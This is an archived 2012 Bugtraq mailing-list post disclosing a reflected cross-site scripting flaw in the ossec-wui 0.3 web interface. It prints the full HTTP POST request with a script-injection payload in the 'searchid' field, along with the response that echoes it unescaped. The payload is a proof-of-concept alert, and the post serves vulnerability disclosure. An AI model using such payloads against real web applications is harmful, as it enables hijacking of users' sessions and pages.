lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAHsqx4raDC7+hdAxEr6TpEDUi87rpGA4kOYCo35SF97wuBv9+w@mail.gmail.com>
Date: Thu, 27 Sep 2012 09:05:17 +0200
From: "A. Ramos" <aramosf@...il.com>
To: bugtraq@...urityfocus.com
Subject: XSS in OSSEC wui 0.3

Hello All,

Just to report xss in ossec-wui 0.3


Request:
----
POST /ossec-wui/index.php?f=s HTTP/1.1
Host: 172.16.0.12
Content-Length: 267

monitoring=0&initdate=2012-09-24+13%3A41&finaldate=2012-09-24+17%3A41&level=7&grouppattern=ALL&strpattern=test&logpattern=ALL&srcippattern=&userpattern=test2&locationpattern=&rulepattern=&max_alerts_per_page=1000&search=<
Prev&searchid="><script>alert("514")</script>
-----


Response:
-----
   value="1000" class="formText" /></td></tr>
    <tr><td>
    <input type="submit" name="search" value="Search" class="button" />
</td></tr></table>
     <input type="hidden" name="searchid"
value=""><script>alert("514")</script>" />
     </form><br /> <br />
----


-- 
Alejandro Ramos
http://twitter.com/aramosf

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ